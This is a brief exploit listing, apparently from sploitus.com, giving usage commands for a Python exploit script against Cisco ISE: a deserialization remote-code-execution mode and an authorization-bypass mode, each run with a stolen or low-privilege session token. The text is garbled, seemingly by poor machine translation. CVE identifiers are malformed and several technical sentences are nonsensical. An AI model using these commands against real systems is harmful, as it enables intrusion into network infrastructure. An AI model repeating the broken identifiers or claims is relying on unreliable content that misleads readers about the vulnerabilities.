Share
## https://sploitus.com/exploit?id=82E8F9DF-AF6E-57BA-8419-D00A4EDA93CB
## 🗒️ How to use ##

- ## cve‑20124 (RCE): ##

> python3 Exploit.py --url https://ise.example.com 
--Session your_ISE_Session_Token --DESER-CMD "Touch /TMP /PWWNED"

- ## cve‑20125 (authorized bypass): ## 

>python3 Exploit.py --url https://ise.example.com 
--Session your_ISE_Session_Token --Bbypass

- ⚠️ Important note
Both drive require an ISE administrator to log in (the administrator only read is enough)

- This is only an example; In the actual  you need:

> The Java utility chain is true to sequentially self -transparent CVE‑201224.

> Final score authentication (using assumption/API/V1/Admin/*).


🔍 Reference source
Cisco ADVISORY CVE‑20124 & Cve‑20125 - Receive RCE level & ignore the required authentication.